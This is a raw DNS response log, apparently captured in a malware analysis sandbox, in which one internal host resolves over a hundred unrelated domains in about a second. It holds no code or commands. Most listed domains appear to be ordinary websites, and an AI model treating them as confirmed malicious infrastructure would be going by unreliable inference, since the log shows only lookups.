Mar 22, 2023 05:45:55.417464018 CET	8.8.8.8	192.168.2.5	0x5035	No error (0)	floopis.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.422930956 CET	8.8.8.8	192.168.2.5	0xf199	No error (0)	onzcda.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.422930956 CET	8.8.8.8	192.168.2.5	0xf199	No error (0)	onzcda.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.444555044 CET	8.8.8.8	192.168.2.5	0xe023	No error (0)	envogen.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.444555044 CET	8.8.8.8	192.168.2.5	0xe023	No error (0)	envogen.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.450820923 CET	8.8.8.8	192.168.2.5	0x8da	No error (0)	ludomemo.com		27.0.174.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.451971054 CET	8.8.8.8	192.168.2.5	0x7084	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.453974962 CET	8.8.8.8	192.168.2.5	0xf358	No error (0)	notis.ru		185.178.208.141	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.459598064 CET	8.8.8.8	192.168.2.5	0x66cd	No error (0)	mondopp.net		173.231.184.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.461133003 CET	8.8.8.8	192.168.2.5	0xa6da	No error (0)	juso-gr.ch		104.21.50.140	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.461133003 CET	8.8.8.8	192.168.2.5	0xa6da	No error (0)	juso-gr.ch		172.67.163.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.477931023 CET	8.8.8.8	192.168.2.5	0x5466	No error (0)	com-edit.fr		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.481714964 CET	8.8.8.8	192.168.2.5	0x86d	No error (0)	univi.it		18.197.121.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.493643999 CET	8.8.8.8	192.168.2.5	0x91ad	No error (0)	bigzz.by		178.249.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.498682022 CET	8.8.8.8	192.168.2.5	0xf2b2	No error (0)	wvs-net.de		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.498682022 CET	8.8.8.8	192.168.2.5	0xf2b2	No error (0)	wvs-net.de		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.499800920 CET	8.8.8.8	192.168.2.5	0x3a69	No error (0)	valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.503199100 CET	8.8.8.8	192.168.2.5	0xfe12	No error (0)	com-edit.fr		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.504739046 CET	8.8.8.8	192.168.2.5	0xbfc8	No error (0)	touchfam.ca		15.197.142.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.504739046 CET	8.8.8.8	192.168.2.5	0xbfc8	No error (0)	touchfam.ca		3.33.152.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.505045891 CET	8.8.8.8	192.168.2.5	0x6e95	No error (0)	daytonir.com		104.18.40.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.505045891 CET	8.8.8.8	192.168.2.5	0x6e95	No error (0)	daytonir.com		172.64.147.213	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.505484104 CET	8.8.8.8	192.168.2.5	0xdc19	No error (0)	angework.com		219.94.128.87	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.505558968 CET	8.8.8.8	192.168.2.5	0x265e	No error (0)	com-edit.fr		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.506994009 CET	8.8.8.8	192.168.2.5	0xb4f6	No error (0)	vivastay.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:55.506994009 CET	8.8.8.8	192.168.2.5	0xb4f6	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:55.506994009 CET	8.8.8.8	192.168.2.5	0xb4f6	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.506994009 CET	8.8.8.8	192.168.2.5	0xb4f6	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.507366896 CET	8.8.8.8	192.168.2.5	0x5182	No error (0)	k-nikko.com		18.177.67.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.513278961 CET	8.8.8.8	192.168.2.5	0x986d	No error (0)	hes.pt		52.19.230.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.513603926 CET	8.8.8.8	192.168.2.5	0xb475	No error (0)	komie.com		59.106.13.181	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.515314102 CET	8.8.8.8	192.168.2.5	0xb53c	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.525011063 CET	8.8.8.8	192.168.2.5	0xcffa	No error (0)	workplus.hu		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.525011063 CET	8.8.8.8	192.168.2.5	0xcffa	No error (0)	workplus.hu		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.531585932 CET	8.8.8.8	192.168.2.5	0x8de1	No error (0)	pertex.com		185.151.30.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.531599998 CET	8.8.8.8	192.168.2.5	0xe5cb	No error (0)	ntc.edu.au		192.124.249.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.532548904 CET	8.8.8.8	192.168.2.5	0xea72	No error (0)	mijash3.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.532548904 CET	8.8.8.8	192.168.2.5	0xea72	No error (0)	mijash3.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.532548904 CET	8.8.8.8	192.168.2.5	0xea72	No error (0)	mijash3.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.532548904 CET	8.8.8.8	192.168.2.5	0xea72	No error (0)	mijash3.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.533720016 CET	8.8.8.8	192.168.2.5	0xa4e5	No error (0)	hbfuels.com		85.233.160.148	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.533744097 CET	8.8.8.8	192.168.2.5	0xe385	No error (0)	ruzee.com		207.180.198.201	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.534465075 CET	8.8.8.8	192.168.2.5	0xdc6	No error (0)	camamat.com		104.21.235.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.534465075 CET	8.8.8.8	192.168.2.5	0xdc6	No error (0)	camamat.com		104.21.235.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.543186903 CET	8.8.8.8	192.168.2.5	0xd05e	No error (0)	dzm.cz		83.167.255.150	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.545146942 CET	8.8.8.8	192.168.2.5	0xbde9	No error (0)	onzcda.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.545146942 CET	8.8.8.8	192.168.2.5	0xbde9	No error (0)	onzcda.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.545598030 CET	8.8.8.8	192.168.2.5	0x2dff	No error (0)	karila.fr		89.107.169.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.546025991 CET	8.8.8.8	192.168.2.5	0x5685	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.557780027 CET	8.8.8.8	192.168.2.5	0x401f	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.560328007 CET	8.8.8.8	192.168.2.5	0xd255	No error (0)	aba.org.eg		192.169.149.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.562664986 CET	8.8.8.8	192.168.2.5	0x2abd	No error (0)	msl-lock.com		165.160.15.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.562664986 CET	8.8.8.8	192.168.2.5	0x2abd	No error (0)	msl-lock.com		165.160.13.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.566725016 CET	8.8.8.8	192.168.2.5	0xad51	No error (0)	softizer.com		185.163.45.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.566837072 CET	8.8.8.8	192.168.2.5	0x2166	No error (0)	tabbles.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.566837072 CET	8.8.8.8	192.168.2.5	0x2166	No error (0)	tabbles.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.567857027 CET	8.8.8.8	192.168.2.5	0x31e2	No error (0)	refintl.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.567857027 CET	8.8.8.8	192.168.2.5	0x31e2	No error (0)	refintl.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.567857027 CET	8.8.8.8	192.168.2.5	0x31e2	No error (0)	refintl.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.567857027 CET	8.8.8.8	192.168.2.5	0x31e2	No error (0)	refintl.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.568316936 CET	8.8.8.8	192.168.2.5	0xcf1	No error (0)	komie.com		59.106.13.181	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.568519115 CET	8.8.8.8	192.168.2.5	0x23cf	No error (0)	aiolos-sa.gr		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.568519115 CET	8.8.8.8	192.168.2.5	0x23cf	No error (0)	aiolos-sa.gr		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.573954105 CET	8.8.8.8	192.168.2.5	0x8db8	No error (0)	ruzee.com		207.180.198.201	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.578185081 CET	8.8.8.8	192.168.2.5	0x392f	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.579710007 CET	8.8.8.8	192.168.2.5	0xa034	No error (0)	from30ty.com		157.7.231.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.581764936 CET	8.8.8.8	192.168.2.5	0x8c3b	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.582369089 CET	8.8.8.8	192.168.2.5	0x404b	No error (0)	cubodown.com		172.67.150.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.582369089 CET	8.8.8.8	192.168.2.5	0x404b	No error (0)	cubodown.com		104.21.30.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.595175028 CET	8.8.8.8	192.168.2.5	0xd558	No error (0)	notis.ru		185.178.208.141	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.596972942 CET	8.8.8.8	192.168.2.5	0xaea9	No error (0)	s5w.com		192.99.226.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.598505974 CET	8.8.8.8	192.168.2.5	0x84a1	No error (0)	reproar.com		194.143.194.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.602889061 CET	8.8.8.8	192.168.2.5	0x451e	No error (0)	semuk.com		52.128.23.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.605007887 CET	8.8.8.8	192.168.2.5	0x41a8	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.607345104 CET	8.8.8.8	192.168.2.5	0x98d4	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.632517099 CET	8.8.8.8	192.168.2.5	0x6ec3	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.637995005 CET	8.8.8.8	192.168.2.5	0xcfd5	No error (0)	tozzhin.com		202.94.166.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.642091036 CET	8.8.8.8	192.168.2.5	0x527a	No error (0)	sgk.home.pl		89.161.136.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.646084070 CET	8.8.8.8	192.168.2.5	0xe9e4	No error (0)	fr-dat.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.647978067 CET	8.8.8.8	192.168.2.5	0xb763	No error (0)	ftmobile.com		199.34.228.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.660188913 CET	8.8.8.8	192.168.2.5	0xd6dc	No error (0)	sjbmw.com		198.199.101.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.669332981 CET	8.8.8.8	192.168.2.5	0xb8cb	No error (0)	geecl.com		213.175.217.57	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.679049969 CET	8.8.8.8	192.168.2.5	0x33e3	No error (0)	avse.hu		185.129.138.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.680221081 CET	8.8.8.8	192.168.2.5	0xbc28	No error (0)	refintl.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.680221081 CET	8.8.8.8	192.168.2.5	0xbc28	No error (0)	refintl.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.680221081 CET	8.8.8.8	192.168.2.5	0xbc28	No error (0)	refintl.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.680221081 CET	8.8.8.8	192.168.2.5	0xbc28	No error (0)	refintl.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.682054996 CET	8.8.8.8	192.168.2.5	0x625	No error (0)	kallman.net		185.76.64.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.710875034 CET	8.8.8.8	192.168.2.5	0xf140	No error (0)	sledsport.ru		185.22.232.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.712589979 CET	8.8.8.8	192.168.2.5	0x7232	No error (0)	nrsi.com		76.223.35.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.745729923 CET	8.8.8.8	192.168.2.5	0xc310	No error (0)	shanks.co.uk		217.19.254.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.758244991 CET	8.8.8.8	192.168.2.5	0xd5b	No error (0)	keio-web.com		219.94.128.216	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.761827946 CET	8.8.8.8	192.168.2.5	0xdf02	No error (0)	kallman.net		185.76.64.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.780968904 CET	8.8.8.8	192.168.2.5	0x1c	No error (0)	pccj.net		104.21.29.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.780968904 CET	8.8.8.8	192.168.2.5	0x1c	No error (0)	pccj.net		172.67.148.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.784904957 CET	8.8.8.8	192.168.2.5	0xeb9b	No error (0)	vvsteknik.dk		185.31.76.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.859813929 CET	8.8.8.8	192.168.2.5	0x905b	No error (0)	any-s.net		108.170.12.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.865663052 CET	8.8.8.8	192.168.2.5	0xa915	No error (0)	biurohera.pl		79.96.161.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.865663052 CET	8.8.8.8	192.168.2.5	0xa915	No error (0)	biurohera.pl		54.36.175.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.873259068 CET	8.8.8.8	192.168.2.5	0x3194	No error (0)	semuk.com		52.128.23.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.884169102 CET	8.8.8.8	192.168.2.5	0xc2fb	No error (0)	pleszew.policja.gov.pl		91.229.22.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.915451050 CET	8.8.8.8	192.168.2.5	0x4495	No error (0)	burstner.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.917280912 CET	8.8.8.8	192.168.2.5	0x29f3	No error (0)	e-kami.net		202.172.28.89	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.921469927 CET	8.8.8.8	192.168.2.5	0xa673	No error (0)	absblast.com		141.193.213.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.925915956 CET	8.8.8.8	192.168.2.5	0x43b3	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.925915956 CET	8.8.8.8	192.168.2.5	0x43b3	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.930356979 CET	8.8.8.8	192.168.2.5	0x5548	No error (0)	4locals.net		80.82.115.227	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.931075096 CET	8.8.8.8	192.168.2.5	0x81ee	No error (0)	shteeble.com		185.106.129.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.948087931 CET	8.8.8.8	192.168.2.5	0xfcc9	No error (0)	awal.ws		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.948304892 CET	8.8.8.8	192.168.2.5	0xe8a4	No error (0)	revoldia.net		45.200.235.135	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.952666998 CET	8.8.8.8	192.168.2.5	0x8f72	No error (0)	sanfotek.net		97.74.42.79	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.952711105 CET	8.8.8.8	192.168.2.5	0xd94	No error (0)	indonesiamedia.com		74.208.215.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.961025000 CET	8.8.8.8	192.168.2.5	0xb04b	No error (0)	bosado.com		5.39.75.157	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.968422890 CET	8.8.8.8	192.168.2.5	0x5c88	No error (0)	mcseurope.nl		46.19.218.80	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:55.976991892 CET	8.8.8.8	192.168.2.5	0x1b9a	No error (0)	coxkitchensandbaths.com		205.149.134.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.010976076 CET	8.8.8.8	192.168.2.5	0x8d80	No error (0)	anduran.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:56.010976076 CET	8.8.8.8	192.168.2.5	0x8d80	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:56.010976076 CET	8.8.8.8	192.168.2.5	0x8d80	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.010976076 CET	8.8.8.8	192.168.2.5	0x8d80	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.017258883 CET	8.8.8.8	192.168.2.5	0x3873	No error (0)	uhsa.edu.ag		192.124.249.13	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.031596899 CET	8.8.8.8	192.168.2.5	0x5a4b	No error (0)	ccrsi.org		198.209.253.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.039268017 CET	8.8.8.8	192.168.2.5	0x2276	No error (0)	fortknox.bm		216.177.137.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.091238022 CET	8.8.8.8	192.168.2.5	0x450e	No error (0)	nme.co.jp		203.0.113.0	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.091907978 CET	8.8.8.8	192.168.2.5	0x9c24	No error (0)	rkengg.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:56.091907978 CET	8.8.8.8	192.168.2.5	0x9c24	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:56.091907978 CET	8.8.8.8	192.168.2.5	0x9c24	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.091907978 CET	8.8.8.8	192.168.2.5	0x9c24	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.103202105 CET	8.8.8.8	192.168.2.5	0x5449	No error (0)	rappich.de		89.31.143.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.103230000 CET	8.8.8.8	192.168.2.5	0x24ce	No error (0)	s5w.com		192.99.226.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.105365038 CET	8.8.8.8	192.168.2.5	0xa5a4	No error (0)	any-s.net		108.170.12.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.113300085 CET	8.8.8.8	192.168.2.5	0xae60	No error (0)	plaske.ua		52.211.245.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.134603977 CET	8.8.8.8	192.168.2.5	0x5238	No error (0)	cjcagent.com		157.112.187.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.136140108 CET	8.8.8.8	192.168.2.5	0x7abe	No error (0)	ludomemo.com		27.0.174.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.146083117 CET	8.8.8.8	192.168.2.5	0xd390	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.162782907 CET	8.8.8.8	192.168.2.5	0xf5d4	No error (0)	mcseurope.nl		46.19.218.80	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.163737059 CET	8.8.8.8	192.168.2.5	0x3d92	No error (0)	nts-web.net		49.212.235.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.170484066 CET	8.8.8.8	192.168.2.5	0xd879	No error (0)	oh28ya.com		54.248.94.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.170484066 CET	8.8.8.8	192.168.2.5	0xd879	No error (0)	oh28ya.com		18.176.155.206	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.202274084 CET	8.8.8.8	192.168.2.5	0x6e2f	No error (0)	t-trust.jp		183.181.82.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.215688944 CET	8.8.8.8	192.168.2.5	0x1253	No error (0)	t-trust.jp		183.181.82.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.232160091 CET	8.8.8.8	192.168.2.5	0xe59f	No error (0)	fogra.com.pl		85.128.55.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.250300884 CET	8.8.8.8	192.168.2.5	0x609d	No error (0)	dhh.la.gov		52.200.51.73	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.266062975 CET	8.8.8.8	192.168.2.5	0x8e90	No error (0)	lyto.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.266062975 CET	8.8.8.8	192.168.2.5	0x8e90	No error (0)	lyto.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.286915064 CET	8.8.8.8	192.168.2.5	0xab16	No error (0)	valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.309729099 CET	8.8.8.8	192.168.2.5	0x6f9	No error (0)	uster.com		104.20.220.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.309729099 CET	8.8.8.8	192.168.2.5	0x6f9	No error (0)	uster.com		172.67.32.172	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.309729099 CET	8.8.8.8	192.168.2.5	0x6f9	No error (0)	uster.com		104.20.221.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.346677065 CET	8.8.8.8	192.168.2.5	0x4154	No error (0)	flamingorecordings.com		35.214.171.193	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.355360031 CET	8.8.8.8	192.168.2.5	0xd868	No error (0)	wahw.com.au		54.194.190.151	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.370393991 CET	8.8.8.8	192.168.2.5	0x96f5	No error (0)	jsaps.com		49.212.235.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.371941090 CET	8.8.8.8	192.168.2.5	0x9046	No error (0)	angework.com		219.94.128.87	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.405203104 CET	8.8.8.8	192.168.2.5	0xad92	No error (0)	nlcv.bas.bg		195.96.252.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.405709982 CET	8.8.8.8	192.168.2.5	0x6096	Server failure (2)	websy.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.431077003 CET	8.8.8.8	192.168.2.5	0xb0ef	Server failure (2)	someikan.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.448353052 CET	8.8.8.8	192.168.2.5	0x2848	No error (0)	jabian.com		104.26.6.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.448353052 CET	8.8.8.8	192.168.2.5	0x2848	No error (0)	jabian.com		172.67.71.13	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.448353052 CET	8.8.8.8	192.168.2.5	0x2848	No error (0)	jabian.com		104.26.7.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.449405909 CET	8.8.8.8	192.168.2.5	0xb410	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.454497099 CET	8.8.8.8	192.168.2.5	0x1e6a	No error (0)	forbin.net		104.21.41.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.454497099 CET	8.8.8.8	192.168.2.5	0x1e6a	No error (0)	forbin.net		172.67.148.35	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.466203928 CET	8.8.8.8	192.168.2.5	0x9776	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.466203928 CET	8.8.8.8	192.168.2.5	0x9776	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.473097086 CET	8.8.8.8	192.168.2.5	0xf4d8	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.496284962 CET	8.8.8.8	192.168.2.5	0x72b	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.497746944 CET	8.8.8.8	192.168.2.5	0x4824	No error (0)	strazynski.pl		85.128.196.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.551438093 CET	8.8.8.8	192.168.2.5	0xc90f	No error (0)	muhr-soehne.de		5.189.171.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.563997030 CET	8.8.8.8	192.168.2.5	0x4efe	No error (0)	xsui.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.564271927 CET	8.8.8.8	192.168.2.5	0x54a9	No error (0)	cqdgroup.com		221.132.33.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.583985090 CET	8.8.8.8	192.168.2.5	0x8dce	No error (0)	ldh.la.gov		75.2.95.235	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.619623899 CET	8.8.8.8	192.168.2.5	0x592f	No error (0)	jnf.at		136.243.147.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.631030083 CET	8.8.8.8	192.168.2.5	0x3135	No error (0)	univi.it		18.197.121.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.631341934 CET	8.8.8.8	192.168.2.5	0x34d6	No error (0)	top1oil.com		104.26.0.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.631341934 CET	8.8.8.8	192.168.2.5	0x34d6	No error (0)	top1oil.com		104.26.1.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:56.631341934 CET	8.8.8.8	192.168.2.5	0x34d6	No error (0)	top1oil.com		172.67.71.55	A (IP address)	IN (0x0001)	false
